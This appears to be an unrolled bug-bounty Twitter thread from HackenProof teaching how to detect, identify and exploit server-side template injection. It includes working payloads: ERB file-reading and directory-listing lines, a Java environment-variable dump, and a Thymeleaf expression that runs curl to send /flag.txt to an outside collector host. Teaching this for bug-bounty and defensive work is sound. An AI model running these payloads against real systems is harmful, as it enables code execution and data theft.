HackenProof Profile picture
Mar 13 10 tweets 4 min read
1/

Vuln: SSTI

Severity: Severity of the issue depends on from the engine that has been used

Server-side template injection occurs when user input is unsafely embedded into a server-side template, allowing users to inject template directives.

#bugbountytips #securitytips #SSTI
2/
Constructing a server-side template injection attack

Detect → Identify → Exploit

- Detect if SST is vulnerable to attack
• Identify the engine that the server uses. There are a huge number of templating languages, characters.
• Develop exploit on received data
3/

How you can detect SSTI:
Try fuzzing the template by injecting a sequence of special characters, such as `${{<%[%'"}}%`
Vulnerable code: render('Hello ' + username)
Request: "vulnerable-website.com/?username=${7*7}"
If the resulting output - `Hello 49` executes a mathematical operation
4/

Once you have detected the template injection potential, the next step is to identify the template engine.

A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines.

Use this decision tree to identify the engine:
5/

Exploit:
Read→Explore→Attack
The first step after finding template injection and identifying the template engine is to read the docs.
Key areas of interest are:
covering basic syntax
'Security Considerations’ section
Lists of builtin methods, functions, filters, variables.
6/

For example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows:

`<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>`
7/

Explore:

Explore the environment and try to discover all the objects to which you have access

Many template engines expose a "self" or "environment" object, which acts like a namespace containing all objects, methods, and attributes that are supported by the engine.
8/

If such an object exists, you can potentially use it to generate a list of objects that are in scope.

For example, in Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

${T(java.lang.System).getenv()}
9/
Exploit
Now you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing function for exploitable vuln.

In this wordlist you can find variables defined in the environments of some engines
10/
Example:
<a th:href="@{__${path}__}" th:title="${title}">

<a th:href="${''.getClass().forName('java.lang.Runtime').
getRuntime().exec('curl -d @/flag.txt
burpcollab.com')}" th:title='pepito'>

http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with HackenProof

HackenProof Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(